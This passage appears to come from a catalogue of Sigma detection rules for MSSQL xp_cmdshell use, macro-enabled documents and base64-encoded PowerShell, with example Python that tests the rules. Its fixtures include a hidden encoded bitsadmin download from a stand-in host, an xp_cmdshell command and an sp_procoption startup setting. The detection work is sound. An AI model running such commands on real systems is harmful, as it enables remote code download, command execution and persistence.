description: Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2024-06-26
tags:
    - attack.execution
logsource:
    product: windows
    service: application
    definition: 'Requirements: MSSQL audit policy to monitor for "xp_cmdshell" must be enabled in order to receive this event in the application log (Follow this tutorial https://dba.stackexchange.com/questions/103183/is-there-any-way-to-monitor-execution-of-xp-cmdshell-in-sql-server-2012)'
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 33205
        Data|contains|all:
            # You can modify this to include specific commands
            - 'object_name:xp_cmdshell'
            - 'statement:EXEC'
    condition: selection
falsepositives:
    - Unknown
level: high
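The MSSQL rules above (sysadmin role, audit settings, sp_procoption, xp_cmdshell option and xp_cmdshell execution) all key on a Provider_Name containing MSSQL, an Event ID, and substrings of the audit text in Data. The example below is added here and is not from the corpus, the rule author or Panther; it runs the three 33205-based rules over constructed audit records and exposes the caveat that matters most when pasting the rendered queries: Sigma string matching is case-insensitive, but the literal Python `in` is not. The needles are copied exactly as the rendered rules spell them, so `ALTER SERVER ROLE [sysadmin] ADD MEMBER` typed in the usual upper case, or `exec xp_cmdshell` in lower case, passes the pasted query untouched while the case-folded version catches both. The same caveat applies to 'vbscript' in the MSHTA rule and 'maggie' in the Maggie rule. Assumptions: the audit text arrives as a single Data string shaped like event 33205's key:value text (the Sigma logsource comment already warns this may need adapting), and Provider_Name is MSSQLSERVER.

```python
# Needles exactly as the rendered rules above spell them (note the mixed case).
RULES = {
    "MSSQL Add Account To Sysadmin Role": (
        "object_name:sysadmin",
        "statement:alter server role [sysadmin] add member ",
    ),
    "MSSQL SPProcoption Set": ("object_name:sp_procoption", "statement:EXEC"),
    "MSSQL XPCmdshell Suspicious Execution": ("object_name:xp_cmdshell", "statement:EXEC"),
}


def audit_event(object_name, statement, provider="MSSQLSERVER"):
    """Constructed record shaped like SQL Server audit event 33205 (not real telemetry).
    Assumption: the pipeline exposes the audit text as a single "Data" string."""
    return {
        "Provider_Name": provider,
        "EventID": 33205,
        "Data": (
            "audit_schema_version:1 action_id:EX succeeded:true "
            "server_principal_name:sa database_name:master "
            f"object_name:{object_name} statement:{statement} additional_information:"
        ),
    }


def data_text(event):
    """Assumption: some pipelines deliver EventData as a list of strings; join it."""
    data = event.get("Data", "")
    return " ".join(data) if isinstance(data, (list, tuple)) else str(data)


def firing_rules(event, case_insensitive=True):
    """Titles of the rules that match this event. case_insensitive=True is Sigma's
    semantics; False reproduces the literal rendering as pasted above."""
    if "MSSQL" not in event.get("Provider_Name", "") or event.get("EventID") != 33205:
        return []
    text = data_text(event)
    fold = str.lower if case_insensitive else (lambda s: s)
    return [
        title
        for title, needles in RULES.items()
        if all(fold(needle) in fold(text) for needle in needles)
    ]


SYSADMIN = audit_event("sysadmin", "ALTER SERVER ROLE [sysadmin] ADD MEMBER [svc_backup]")
PROCOPTION = audit_event(
    "sp_procoption",
    "EXEC sp_procoption @ProcName = N'dbo.sp_boot', @OptionName = 'startup', @OptionValue = 'on'",
)
XPCMD = audit_event("xp_cmdshell", "exec xp_cmdshell 'whoami'")
BENIGN = audit_event("server_principals", "SELECT name FROM sys.server_principals")

if __name__ == "__main__":
    for name, ev in [("SYSADMIN", SYSADMIN), ("PROCOPTION", PROCOPTION),
                     ("XPCMD", XPCMD), ("BENIGN", BENIGN)]:
        print(name, "sigma:", firing_rules(ev),
              "literal:", firing_rules(ev, case_insensitive=False))
```

The literal pass misses SYSADMIN and XPCMD and catches only PROCOPTION, where the statement happens to be in the same case as the needle. Before deploying any rendered query that matches on free text, either lower-case both sides as above or confirm your Panther log schema normalises the field.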
high Moderate High FP
Macro Enabled In A Potentially Suspicious Document
Detects writes to the Office "TrustRecords" registry key, which records documents for which a user has enabled macros or editing, where the document path is in a potentially suspicious location
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
panther query
def rule(event):
    if all(
        [
            "\\Security\\Trusted Documents\\TrustRecords"
            in event.deep_get("TargetObject", default=""),
            any(
                [
                    "/AppData/Local/Microsoft/Windows/INetCache/"
                    in event.deep_get("TargetObject", default=""),
                    "/AppData/Local/Temp/" in event.deep_get("TargetObject", default=""),
                    "/PerfLogs/" in event.deep_get("TargetObject", default=""),
                    "C:/Users/Public/" in event.deep_get("TargetObject", default=""),
                    "file:///D:/" in event.deep_get("TargetObject", default=""),
                    "file:///E:/" in event.deep_get("TargetObject", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Macro Enabled In A Potentially Suspicious Document
id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
related:
    - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2
      type: derived
status: test
description: Detects writes to the Office "TrustRecords" registry key, which records documents for which a user has enabled macros or editing, where the document path is in a potentially suspicious location
references:
    - https://twitter.com/inversecos/status/1494174785621819397
    - Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-21
modified: 2023-08-17
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: registry_set
    product: windows
detection:
    selection_value:
        TargetObject|contains: '\Security\Trusted Documents\TrustRecords'
    selection_paths:
        TargetObject|contains:
            # Note: add more locations where you would not expect a user to open macro-enabled documents
            - '/AppData/Local/Microsoft/Windows/INetCache/'
            - '/AppData/Local/Temp/'
            - '/PerfLogs/'
            - 'C:/Users/Public/'
            - 'file:///D:/'
            - 'file:///E:/'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
high Moderate Medium FP
Malicious Base64 Encoded PowerShell Keywords in Command Lines
Detects base64-encoded forms of suspicious keywords (such as "bitsadmin /transfer", "CreateRemoteThread" and "IO.MemoryStream") at every byte alignment, in PowerShell command lines that also request a hidden window
status test author John Lambert (rule) ATT&CK sub-technique id f26c6093-6f14-4b12-800f-0fcb46f5ffd0
panther query
def rule(event):
    if all(
        [
            any(
                [
                    any(
                        [
                            event.deep_get("Image", default="").endswith("\\powershell.exe"),
                            event.deep_get("Image", default="").endswith("\\pwsh.exe"),
                        ]
                    ),
                    event.deep_get("OriginalFileName", default="")
                    in ["PowerShell.EXE", "pwsh.dll"],
                ]
            ),
            " hidden " in event.deep_get("CommandLine", default=""),
            any(
                [
                    "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA"
                    in event.deep_get("CommandLine", default=""),
                    "aXRzYWRtaW4gL3RyYW5zZmVy" in event.deep_get("CommandLine", default=""),
                    "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA"
                    in event.deep_get("CommandLine", default=""),
                    "JpdHNhZG1pbiAvdHJhbnNmZX" in event.deep_get("CommandLine", default=""),
                    "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg"
                    in event.deep_get("CommandLine", default=""),
                    "Yml0c2FkbWluIC90cmFuc2Zlc" in event.deep_get("CommandLine", default=""),
                    "AGMAaAB1AG4AawBfAHMAaQB6AGUA" in event.deep_get("CommandLine", default=""),
                    "JABjAGgAdQBuAGsAXwBzAGkAegBlA" in event.deep_get("CommandLine", default=""),
                    "JGNodW5rX3Npem" in event.deep_get("CommandLine", default=""),
                    "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" in event.deep_get("CommandLine", default=""),
                    "RjaHVua19zaXpl" in event.deep_get("CommandLine", default=""),
                    "Y2h1bmtfc2l6Z" in event.deep_get("CommandLine", default=""),
                    "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A"
                    in event.deep_get("CommandLine", default=""),
                    "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg"
                    in event.deep_get("CommandLine", default=""),
                    "lPLkNvbXByZXNzaW9u" in event.deep_get("CommandLine", default=""),
                    "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA"
                    in event.deep_get("CommandLine", default=""),
                    "SU8uQ29tcHJlc3Npb2" in event.deep_get("CommandLine", default=""),
                    "Ty5Db21wcmVzc2lvb" in event.deep_get("CommandLine", default=""),
                    "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ"
                    in event.deep_get("CommandLine", default=""),
                    "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA"
                    in event.deep_get("CommandLine", default=""),
                    "lPLk1lbW9yeVN0cmVhb" in event.deep_get("CommandLine", default=""),
                    "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A"
                    in event.deep_get("CommandLine", default=""),
                    "SU8uTWVtb3J5U3RyZWFt" in event.deep_get("CommandLine", default=""),
                    "Ty5NZW1vcnlTdHJlYW" in event.deep_get("CommandLine", default=""),
                    "4ARwBlAHQAQwBoAHUAbgBrA" in event.deep_get("CommandLine", default=""),
                    "5HZXRDaHVua" in event.deep_get("CommandLine", default=""),
                    "AEcAZQB0AEMAaAB1AG4Aaw" in event.deep_get("CommandLine", default=""),
                    "LgBHAGUAdABDAGgAdQBuAGsA" in event.deep_get("CommandLine", default=""),
                    "LkdldENodW5r" in event.deep_get("CommandLine", default=""),
                    "R2V0Q2h1bm" in event.deep_get("CommandLine", default=""),
                    "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A"
                    in event.deep_get("CommandLine", default=""),
                    "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA"
                    in event.deep_get("CommandLine", default=""),
                    "RIUkVBRF9JTkZPNj" in event.deep_get("CommandLine", default=""),
                    "SFJFQURfSU5GTzY0" in event.deep_get("CommandLine", default=""),
                    "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA"
                    in event.deep_get("CommandLine", default=""),
                    "VEhSRUFEX0lORk82N" in event.deep_get("CommandLine", default=""),
                    "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA"
                    in event.deep_get("CommandLine", default=""),
                    "cmVhdGVSZW1vdGVUaHJlYW" in event.deep_get("CommandLine", default=""),
                    "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA"
                    in event.deep_get("CommandLine", default=""),
                    "NyZWF0ZVJlbW90ZVRocmVhZ" in event.deep_get("CommandLine", default=""),
                    "Q3JlYXRlUmVtb3RlVGhyZWFk" in event.deep_get("CommandLine", default=""),
                    "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA"
                    in event.deep_get("CommandLine", default=""),
                    "0AZQBtAG0AbwB2AGUA" in event.deep_get("CommandLine", default=""),
                    "1lbW1vdm" in event.deep_get("CommandLine", default=""),
                    "AGUAbQBtAG8AdgBlA" in event.deep_get("CommandLine", default=""),
                    "bQBlAG0AbQBvAHYAZQ" in event.deep_get("CommandLine", default=""),
                    "bWVtbW92Z" in event.deep_get("CommandLine", default=""),
                    "ZW1tb3Zl" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Malicious Base64 Encoded PowerShell Keywords in Command Lines
id: f26c6093-6f14-4b12-800f-0fcb46f5ffd0
status: test
description: Detects base64-encoded forms of suspicious keywords (such as "bitsadmin /transfer", "CreateRemoteThread" and "IO.MemoryStream") at every byte alignment, in PowerShell command lines that also request a hidden window
references:
    - http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/
author: John Lambert (rule)
date: 2019-01-16
modified: 2023-01-05
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_hidden:
        CommandLine|contains: ' hidden '
    selection_encoded:
        CommandLine|contains:
            - 'AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA'
            - 'aXRzYWRtaW4gL3RyYW5zZmVy'
            - 'IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA'
            - 'JpdHNhZG1pbiAvdHJhbnNmZX'
            - 'YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg'
            - 'Yml0c2FkbWluIC90cmFuc2Zlc'
            - 'AGMAaAB1AG4AawBfAHMAaQB6AGUA'
            - 'JABjAGgAdQBuAGsAXwBzAGkAegBlA'
            - 'JGNodW5rX3Npem'
            - 'QAYwBoAHUAbgBrAF8AcwBpAHoAZQ'
            - 'RjaHVua19zaXpl'
            - 'Y2h1bmtfc2l6Z'
            - 'AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A'
            - 'kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg'
            - 'lPLkNvbXByZXNzaW9u'
            - 'SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA'
            - 'SU8uQ29tcHJlc3Npb2'
            - 'Ty5Db21wcmVzc2lvb'
            - 'AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ'
            - 'kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA'
            - 'lPLk1lbW9yeVN0cmVhb'
            - 'SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A'
            - 'SU8uTWVtb3J5U3RyZWFt'
            - 'Ty5NZW1vcnlTdHJlYW'
            - '4ARwBlAHQAQwBoAHUAbgBrA'
            - '5HZXRDaHVua'
            - 'AEcAZQB0AEMAaAB1AG4Aaw'
            - 'LgBHAGUAdABDAGgAdQBuAGsA'
            - 'LkdldENodW5r'
            - 'R2V0Q2h1bm'
            - 'AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A'
            - 'QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA'
            - 'RIUkVBRF9JTkZPNj'
            - 'SFJFQURfSU5GTzY0'
            - 'VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA'
            - 'VEhSRUFEX0lORk82N'
            - 'AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA'
            - 'cmVhdGVSZW1vdGVUaHJlYW'
            - 'MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA'
            - 'NyZWF0ZVJlbW90ZVRocmVhZ'
            - 'Q3JlYXRlUmVtb3RlVGhyZWFk'
            - 'QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA'
            - '0AZQBtAG0AbwB2AGUA'
            - '1lbW1vdm'
            - 'AGUAbQBtAG8AdgBlA'
            - 'bQBlAG0AbQBvAHYAZQ'
            - 'bWVtbW92Z'
            - 'ZW1tb3Zl'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
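The 48 constants in this rule are not arbitrary. Decoding them gives eight keywords (bitsadmin /transfer, $chunk_size, IO.Compression, IO.MemoryStream, .GetChunk, THREAD_INFO64, CreateRemoteThread, memmove), each listed six times because the base64 form of a substring depends on its byte alignment (three possibilities) and on whether the script is ASCII or the UTF-16LE that -EncodedCommand uses. The Lee Holmes post in the references explains the method. The example below is added here and is my code, not the rule author's or Panther's: it regenerates the alignment-independent fragments from the keywords, so the list can be re-derived or extended, and runs the rule's three selections over a constructed hidden -EncodedCommand event. A derived fragment can be one character longer than the pasted constant (the rule trims an extra stable character on some alignments), so the comparison against the page's constants is substring containment.

```python
import base64

# Keywords the rule's 48 constants decode to; each appears six times, once per
# byte alignment (0, 1, 2) for ASCII and for the UTF-16LE that -EncodedCommand uses.
KEYWORDS = (
    "bitsadmin /transfer", "$chunk_size", "IO.Compression", "IO.MemoryStream",
    ".GetChunk", "THREAD_INFO64", "CreateRemoteThread", "memmove",
)


def stable_fragments(keyword):
    """For each encoding and alignment, the run of base64 characters that depends
    only on the keyword bytes. Encoding the keyword twice with different filler
    bytes around it and keeping the characters that agree isolates that run."""
    frags = {}
    for enc in ("ascii", "utf-16le"):
        data = keyword.encode(enc)
        for offset in range(3):
            a, b = (
                base64.b64encode(filler * offset + data + filler * 2).decode("ascii")
                for filler in (b"\x00", b"\xff")
            )
            core = run = ""
            for x, y in zip(a, b):
                # padding "=" agrees trivially, so it must not extend the run
                run = run + x if x == y and x != "=" else ""
                core = max(core, run, key=len)
            frags[(enc, offset)] = core
    return frags


FRAGMENTS = sorted({f for kw in KEYWORDS for f in stable_fragments(kw).values()})


def encoded_command(script):
    """What PowerShell's -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def rule(event):
    """Same three selections as the Sigma rule above, with the fragment list derived
    rather than pasted. Image/OriginalFileName are case-folded as Sigma matching is;
    the base64 fragments themselves are case-sensitive by nature."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    return (
        (image.endswith(("\\powershell.exe", "\\pwsh.exe")) or original in ("powershell.exe", "pwsh.dll"))
        and " hidden " in cmd.lower()
        and any(fragment in cmd for fragment in FRAGMENTS)
    )


# Constructed process-creation records (not real telemetry).
PWSH = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
MALICIOUS = {
    "Image": PWSH,
    "CommandLine": "powershell.exe -w hidden -EncodedCommand "
    + encoded_command("bitsadmin /transfer job http://example.invalid/a.exe C:\\Users\\Public\\a.exe"),
}
BENIGN = {
    "Image": PWSH,
    "CommandLine": "powershell.exe -w hidden -EncodedCommand " + encoded_command("Get-Date"),
}

if __name__ == "__main__":
    for (enc, offset), frag in stable_fragments("bitsadmin /transfer").items():
        print(f"{enc:9s} offset {offset}: {frag}")
    print("malicious:", rule(MALICIOUS), " benign:", rule(BENIGN))
```

To add a keyword of your own, append it to KEYWORDS and paste the six values of stable_fragments() into the Sigma list; anything shorter than about eight characters should be avoided, because a short base64 run will match inside unrelated encoded content.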